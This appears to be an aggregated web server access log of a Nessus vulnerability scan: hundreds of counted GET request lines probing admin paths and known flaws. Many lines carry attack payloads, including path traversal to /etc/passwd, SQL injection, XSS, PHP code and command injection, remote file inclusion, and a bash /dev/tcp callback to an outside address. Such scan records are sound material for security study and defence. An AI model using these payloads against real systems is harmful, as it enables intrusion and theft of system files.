1 GET /admin/airflow/login HTTP/1.1
1 GET /admin/awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /admin/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /admin/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /admin/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /admin/backup.php HTTP/1.1
1 GET /admin/biztalkhttpreceive.dll HTTP/1.1
1 GET /admin/cal_login.php HTTP/1.1
1 GET /admin/ckeditor/ckeditor.js HTTP/1.1
1 GET /admin/ckeditor/plugins/image2/plugin.js HTTP/1.1
1 GET /admin/ckeditor/plugins/preview/preview.html HTTP/1.1
1 GET /admin/ckeditor/samples/sample_posteddata.php HTTP/1.1
1 GET /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
1 GET /admin/connect.inc HTTP/1.1
1 GET /admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
1 GET /admin/dwsync.xml HTTP/1.1
1 GET /admin/faq.php HTTP/1.1
1 GET /admin/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
1 GET /admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
1 GET /admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
1 GET /admin/index.html HTTP/1.1
3 GET /admin/index.jsp HTTP/1.1
1 GET /admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
1 GET /admin/index.php?cmd=login HTTP/1.1
1 GET /admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=666682492&pollvars[poll_password]=819cc74f14e70661bd718de5978fcdf8 HTTP/1.1
2 GET /admin/index.php HTTP/1.1
1 GET /admin/info.php HTTP/1.1
1 GET /admin/info/refs?service=git-upload-pack HTTP/1.1
1 GET /admin/ip_manage.php HTTP/1.1
1 GET /admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
1 GET /admin/login-default.do HTTP/1.1
1 GET /admin/login.do HTTP/1.1
2 GET /admin/login.html HTTP/1.1
1 GET /admin/login.jsp?url=main.jsp HTTP/1.1
2 GET /admin/login.jsp HTTP/1.1
2 GET /admin/login.php HTTP/1.1
1 GET /admin/login/ HTTP/1.1
1 GET /admin/nessus%22%3e%3cscript%3ealert%28%27django_admin_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /admin/nessus/ HTTP/1.1
1 GET /admin/o12guest.mdb HTTP/1.1
1 GET /admin/objects.inc.php4?Server[path]=http[:]//example[.]com&Server[language_file]=nessus.php HTTP/1.1
1 GET /admin/operators.php?view HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
1 GET /admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
1 GET /admin/portal/diag/index.jsp HTTP/1.1
1 GET /admin/public/index.html HTTP/1.1
1 GET /admin/r57.php HTTP/1.1
1 GET /admin/r57shell.php HTTP/1.1
1 GET /admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
1 GET /admin/rol.php HTTP/1.1
1 GET /admin/setup.php HTTP/1.1
1 GET /admin/sitemap.xml HTTP/1.1
1 GET /admin/snoop/ HTTP/1.1
1 GET /admin/snoopservlet/ HTTP/1.1
1 GET /admin/static/./WEB-INF/web.xml HTTP/1.1
1 GET /admin/statistics/ConfigureStatistics HTTP/1.1
1 GET /admin/struts/webconsole.html HTTP/1.1
1 GET /admin/templates/header.php?admin_root=http[:]//example[.]com HTTP/1.1
1 GET /admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
1 GET /admin/users.php HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /admin/www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /admin/www.83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /admin_/ HTTP/1.1
4 GET /admin_t/include/aff_liste_langue.php?rep_include=http[:]//example[.]com/ HTTP/1.1
1 GET /admin_ui/mas/ent/login.html HTTP/1.1
4 GET /admin HTTP/1.1
1 GET /admincp/login.php HTTP/1.1
1 GET /administration/ HTTP/1.1
7 GET /administrator.cgi HTTP/1.1
1 GET /administrator/.git/HEAD HTTP/1.1
1 GET /administrator/.git/info/refs?service=git-upload-pack HTTP/1.1
1 GET /administrator/.svn/entries HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /administrator/83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /administrator/83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /administrator/CVS/Entries HTTP/1.1
1 GET /administrator/HEAD HTTP/1.1
1 GET /administrator/PE5p3rXa.htm HTTP/1.1
1 GET /administrator/SnoopServlet/ HTTP/1.1
1 GET /administrator/_notes/dwsync.xml HTTP/1.1
1 GET /administrator/_vti_inf.html HTTP/1.1
8 GET /administrator/ HTTP/1.1
1 GET /administrator/awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /administrator/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /administrator/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /administrator/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /administrator/biztalkhttpreceive.dll HTTP/1.1
1 GET /administrator/dwsync.xml HTTP/1.1
1 GET /administrator/faq.php HTTP/1.1
1 GET /administrator/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
3 GET /administrator/index.jsp HTTP/1.1
3 GET /administrator/index.php HTTP/1.1
1 GET /administrator/info.php HTTP/1.1
1 GET /administrator/info/refs?service=git-upload-pack HTTP/1.1
1 GET /administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /administrator/nessus/ HTTP/1.1
1 GET /administrator/phpinfo.php HTTP/1.1
1 GET /administrator/portal/diag/index.jsp HTTP/1.1
1 GET /administrator/r57.php HTTP/1.1
1 GET /administrator/r57shell.php HTTP/1.1
1 GET /administrator/rol.php HTTP/1.1
1 GET /administrator/sitemap.xml HTTP/1.1
1 GET /administrator/snoop/ HTTP/1.1
1 GET /administrator/snoopservlet/ HTTP/1.1
1 GET /administrator/static/./WEB-INF/web.xml HTTP/1.1
1 GET /administrator/struts/webconsole.html HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /administrator/www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /administrator/www.83.118.68.34.googleusercontent.zip HTTP/1.1
2 GET /administrator HTTP/1.1
1 GET /adminuser/ HTTP/1.1
1 GET /adminweb/ HTTP/1.1
1 GET /admisapi/ HTTP/1.1
1 GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
2 GET /ads/ HTTP/1.1
2 GET /ads/index.php HTTP/1.1
1 GET /ads/www/delivery/ac.php?bannerid=-1717627913+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_8VTVNFEJ]));die;/* HTTP/1.1
1 GET /ads/www/delivery/ac.php?bannerid=-938+OR+1=1 HTTP/1.1
1 GET /ads/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
2 GET /adserver/ HTTP/1.1
1 GET /adserver/www/delivery/ac.php?bannerid=-1717627913+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_KUOHHLJN]));die;/* HTTP/1.1
1 GET /adserver/www/delivery/ac.php?bannerid=-497+OR+1=1 HTTP/1.1
1 GET /adserver/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /adxmlrpc.php HTTP/1.1
1 GET /af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /agenda.php3 HTTP/1.1
1 GET /agenda/ HTTP/1.1
1 GET /agenda/agenda.php3 HTTP/1.1
1 GET /agentes/ HTTP/1.1
1 GET /agora/ HTTP/1.1
1 GET /agora/index.php HTTP/1.1
1 GET /ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%201758880185%2c2%2c235810029%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
1 GET /ajaxplorer/content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
1 GET /ajaxplorer/index.php?get_action=get_boot_conf HTTP/1.1
1 GET /al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
1 GET /albatross/A3Suite HTTP/1.1
1 GET /album.pl?function=about HTTP/1.1
2 GET /album/ HTTP/1.1
1 GET /album/language.php?data_dir=/etc/passwd%00 HTTP/1.1
1 GET /albums/ HTTP/1.1
1 GET /albums/db_input.php HTTP/1.1
1 GET /alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /altercast/AlterCast?op=%3cscript%3ealert%28%22adobe_document_server_61.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
1 GET /amazon/ HTTP/1.1
1 GET /amember//plugins/db/mysql/mysql.inc.php HTTP/1.1
1 GET /amember//plugins/payment/authorize_aim/authorize_aim.inc.php HTTP/1.1
1 GET /amember//plugins/payment/beanstream/beanstream.inc.php HTTP/1.1
1 GET /amember//plugins/payment/cdg/cdg.inc.php HTTP/1.1
1 GET /amember//plugins/payment/compuworld/compuworld.inc.php HTTP/1.1
1 GET /amember//plugins/payment/directone/directone.inc.php HTTP/1.1
1 GET /amember//plugins/payment/echo/config.inc.php HTTP/1.1
1 GET /amember//plugins/payment/efsnet/efsnet.inc.php HTTP/1.1
1 GET /amember//plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php HTTP/1.1
1 GET /amember//plugins/payment/eway/eway.inc.php HTTP/1.1
1 GET /amember//plugins/payment/linkpoint/linkpoint.inc.php HTTP/1.1
1 GET /amember//plugins/payment/logiccommerce/logiccommerce.inc.php HTTP/1.1
1 GET /amember//plugins/payment/netbilling/netbilling.inc.php HTTP/1.1
1 GET /amember//plugins/payment/payflow_pro/payflow_pro.inc.php HTTP/1.1
1 GET /amember//plugins/payment/paymentsgateway/paymentsgateway.inc.php HTTP/1.1
1 GET /amember//plugins/payment/payos/payos.inc.php HTTP/1.1
1 GET /amember//plugins/payment/payready/payready.inc.php HTTP/1.1
1 GET /amember//plugins/payment/plugnplay/plugnplay.inc.php HTTP/1.1
1 GET /amember//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php HTTP/1.1
1 GET /amember/ HTTP/1.1
1 GET /amserver/UI/Login?user=nessus-1717627781 HTTP/1.1
1 GET /amserver/ HTTP/1.1
1 GET /anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /analog/ HTTP/1.1
1 GET /analytics/piwik/CHANGELOG.md HTTP/1.1
1 GET /analytics/piwik/index.php HTTP/1.1
1 GET /angeline/ HTTP/1.1
1 GET /angeline/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
1 GET /anthill/ HTTP/1.1
3 GET /antiboard.php?thread_id=' HTTP/1.1
1 GET /ap// HTTP/1.1
1 GET /ap/control/checkLogin HTTP/1.1
1 GET /apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
1 GET /apache/ HTTP/1.1
1 GET /apex/f?p=nessuscheck HTTP/1.1
1 GET /apex/listenerConfigure HTTP/1.1
1 GET /apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
1 GET /api/getServices?name[]=$(/bin/bash%20-c%20%22nslookup%20log4shell-generic-DCZpVSHt56mn5p3I6WjAten.w.nessus.org) HTTP/1.1
1 GET /api/getServices?name[]=$(bash%20-c%20%22echo%20exploited_port[80]by_nessus%20%3E/dev/tcp/172.16.4.12/24441\") HTTP/1.1
1 GET /api/hpe-restapi.json HTTP/1.1
1 GET /api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
1 GET /api/sonicos/is-sslvpn-enabled HTTP/1.1
1 GET /api/v1.0/environment HTTP/1.1
2 GET /api/v1/?format=api HTTP/1.1
1 GET /api/v1/version HTTP/1.1
1 GET /api/version HTTP/1.1
1 GET /api2/Localization/SolarWinds.Orion.SamAppOptics.Strings.dll HTTP/1.1
1 GET /api HTTP/1.1
1 GET /app/ HTTP/1.1
1 GET /app/idxasp.html HTTP/1.1
1 GET /app/ui/login.jsp HTTP/1.1
1 GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
1 GET /applets/ HTTP/1.1
1 GET /appliance/ HTTP/1.1
1 GET /application/ HTTP/1.1
1 GET /applications/ HTTP/1.1
1 GET /apps/ HTTP/1.1
1 GET /apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /apps/zxtm/login.cgi HTTP/1.1
1 GET /appserv/main.php?appserv_root=appserv_appserv_root_includes.nasl HTTP/1.1
1 GET /ar/ HTTP/1.1
1 GET /ar/control/checkLogin HTTP/1.1
1 GET /archiva/index.action HTTP/1.1
1 GET /archive/ HTTP/1.1
1 GET /archives/ HTTP/1.1
1 GET /articles/ HTTP/1.1
1 GET /artifactory/webapp/home.html?0 HTTP/1.1
1 GET /artifactory/webapp HTTP/1.1
1 GET /ashnews.php?pathtoashnews=http[:]//example[.]com/ HTTP/1.1
1 GET /asp/ HTTP/1.1
1 GET /aspera/faspex/login/new?local=true HTTP/1.1
1 GET /aspnet/ HTTP/1.1
1 GET /aspx/ HTTP/1.1
1 GET /assetmaint/control/checkLogin HTTP/1.1
1 GET /assets/js/conf/global_config.js HTTP/1.1
1 GET /asteridex/ HTTP/1.1
1 GET /asteridex/callboth.php?SEQ=654321&OUT=123456&IN=1717627965%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
1 GET /atc/ HTTP/1.1
1 GET /athenareg.php?pass=%20;id HTTP/1.1
1 GET /atmail.pl HTTP/1.1
1 GET /atmailopen/atmail.pl HTTP/1.1
1 GET /atmailopen/index.php/admin/ HTTP/1.1
1 GET /atmailopen/index.php HTTP/1.1
2 GET /atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /auction/ HTTP/1.1
1 GET /auction/admin/admin.php HTTP/1.1
1 GET /auction/includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /auction/includes/messages.inc.php?include_path=/etc/passwd%00&lan=EN HTTP/1.1
1 GET /auction/includes/settings.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /auktion/ HTTP/1.1
1 GET /auktion/admin/admin.php HTTP/1.1
1 GET /auth/ HTTP/1.1
4 GET /auth/login HTTP/1.1
1 GET /authadmin/ HTTP/1.1
1 GET /authenticate/login HTTP/1.1
1 GET /autodiscover/autodiscover.xml HTTP/1.0
1 GET /autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
1 GET /autopass/login_input HTTP/1.1
1 GET /av/api/1.0/system/local/tasks HTTP/1.1
1 GET /aw/ HTTP/1.1
1 GET /awstats-cgi/ HTTP/1.1
1 GET /awstats-cgi/awstats.cgi HTTP/1.1
1 GET /awstats-cgi/awstats.pl HTTP/1.1
1 GET /awstats.cgi HTTP/1.1
1 GET /awstats.pl HTTP/1.1
1 GET /awstats/ HTTP/1.1
1 GET /awstats/awstats.cgi HTTP/1.1
1 GET /awstats/awstats.pl HTTP/1.1
1 GET /awstats/cgi-bin/ HTTP/1.1
1 GET /awstats/cgi-bin/awstats.cgi HTTP/1.1
1 GET /awstats/cgi-bin/awstats.pl HTTP/1.1
1 GET /awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /awstatstotals/ HTTP/1.1
1 GET /axis/DirectDownload.jsp HTTP/1.1
1 GET /axis2-web/index.jsp HTTP/1.1
2 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-web/index.jsp HTTP/1.1
1 GET /axis2/services/CUPMService/ping HTTP/1.1
1 GET /ayuda/ HTTP/1.1
1 GET /b/ HTTP/1.1
1 GET /b2-include/ HTTP/1.1
1 GET /b2-tools/gm-2-b2.php?b2inc=http[:]//example[.]com HTTP/1.1
1 GET /bYvTnJuH.htm HTTP/1.1
1 GET /back/ HTTP/1.1
1 GET /backend/ HTTP/1.1
1 GET /backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
1 GET /backup/ HTTP/1.1
1 GET /backups/ HTTP/1.1
1 GET /bad_permissions.html HTTP/1.1
1 GET /bak/ HTTP/1.1
1 GET /balancer/ HTTP/1.1
1 GET /bamboo/start.action HTTP/1.1
1 GET /banca/ HTTP/1.1
1 GET /banco/ HTTP/1.1
1 GET /bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script> HTTP/1.1
1 GET /bank/ HTTP/1.1
1 GET /banner/ HTTP/1.1
1 GET /banner01/ HTTP/1.1
1 GET /bannerexchange/ HTTP/1.1
1 GET /bannerexchange/resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /banners/ HTTP/1.1
1 GET /base/ HTTP/1.1
1 GET /base/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1717627963')</script> HTTP/1.1
2 GET /base/base_main.php HTTP/1.1
2 GET /base/base_maintenance.php HTTP/1.1
1 GET /base/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
1 GET /base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1717627963')</script> HTTP/1.1
2 GET /base_main.php HTTP/1.1
2 GET /base_maintenance.php HTTP/1.1
1 GET /base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
1 GET /baselining/version HTTP/1.1
1 GET /basilic/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
1 GET /basilix.php HTTP/1.1
1 GET /basilix/ HTTP/1.1
1 GET /basilix/basilix.php HTTP/1.1
1 GET /batch/ HTTP/1.1
1 GET /bb-dnbd/ HTTP/1.1
1 GET /bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
1 GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
1 GET /bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
1 GET /bblog/index.php HTTP/1.1
1 GET /bbs/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /bbs/ HTTP/1.1
1 GET /bbv/ HTTP/1.1
1 GET /bdata/ HTTP/1.1
1 GET /bdatos/ HTTP/1.1
1 GET /bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /beta/ HTTP/1.1
1 GET /bi/control/checkLogin HTTP/1.1
1 GET /bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
1 GET /bigtree/admin/login/ HTTP/1.1
1 GET /bigtree/index.php/admin/login/ HTTP/1.1
1 GET /bigtree/site/admin/login/ HTTP/1.1
1 GET /bigtree/site/index.php/admin/login/ HTTP/1.1
1 GET /billing/billingmanager_income.asp HTTP/1.1
1 GET /billpay/ HTTP/1.1
1 GET /bin/ HTTP/1.1
1 GET /bin/html2text.php HTTP/1.1
1 GET /birt/control/checkLogin HTTP/1.1
1 GET /bitrix/admin/index.php?lang=en HTTP/1.1
1 GET /bitweaver/ HTTP/1.1
1 GET /bitweaver/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
1 GET /bitweaver/wiki/rankings.php HTTP/1.1
1 GET /bizmail.cgi HTTP/1.1
1 GET /biztalkhttpreceive.dll HTTP/1.1
1 GET /blob/ HTTP/1.1
1 GET /blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
3 GET /blog/ HTTP/1.1
1 GET /blog/admin/connect.inc HTTP/1.1
1 GET /blog/admin/users.php HTTP/1.1
1 GET /blog/bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
1 GET /blog/doc/index.php?s=/etc/passwd%00 HTTP/1.1
1 GET /blog/index.php?op=Default&Date=200607%27%20UNION%20SELECT%201%2c1831459894%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /blog/index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1602970821,943137723,1,1,1,1,1--&blogId=1 HTTP/1.1
1 GET /blog/index.php?op=ViewArticle&articleId=9999%2f%2a%2a%2fUNION%2f%2a%2a%2fSELECT%2f%2a%2a%2f1717627951%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /blog/index.php?post=../config/password HTTP/1.1
2 GET /blog/index.php HTTP/1.1
1 GET /blog/install/index.php HTTP/1.1
1 GET /blog/login.php HTTP/1.1
1 GET /blog/mail.php?id='/**/UNION/**/SELECT/**/1,2,1717627962,4--&blog=1 HTTP/1.1
1 GET /blog/mt.cgi?__mode=logout HTTP/1.1
1 GET /blog/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
1 GET /blog/rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
1 GET /blog/search.aspx HTTP/1.1
1 GET /blog/search.cfm HTTP/1.1
1 GET /blog/search.php HTTP/1.1
1 GET /blog/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
1 GET /blog/upgrade/index.php HTTP/1.1
2 GET /blogs/ HTTP/1.1
1 GET /bmachine/ HTTP/1.1
1 GET /bmachine/index.php HTTP/1.1
1 GET /bmachine/mail.php?id='/**/UNION/**/SELECT/**/1,2,1717627962,4--&blog=1 HTTP/1.1
1 GET /boadmin/ HTTP/1.1
2 GET /board/ HTTP/1.1
1 GET /board/acp/index.php HTTP/1.1
1 GET /board/acp/lib/inserts.sql HTTP/1.1
1 GET /board/admin.php?action=viewpro&member=admin<script>x</script> HTTP/1.1
1 GET /board/buddy.php?action=<script>x</script> HTTP/1.1
1 GET /board/db/users.dat HTTP/1.1
1 GET /board/forumdisplay.php?fid=21\"><script>x</script> HTTP/1.1
2 GET /board/index.php HTTP/1.1
2 GET /board/misc.php?action=login HTTP/1.1
1 GET /board/view_user.php?list=1&letter=&sort_by='select HTTP/1.1
1 GET /boarddata/data/user.idx HTTP/1.1
1 GET /boastmachine/ HTTP/1.1
1 GET /boastmachine/index.php HTTP/1.1
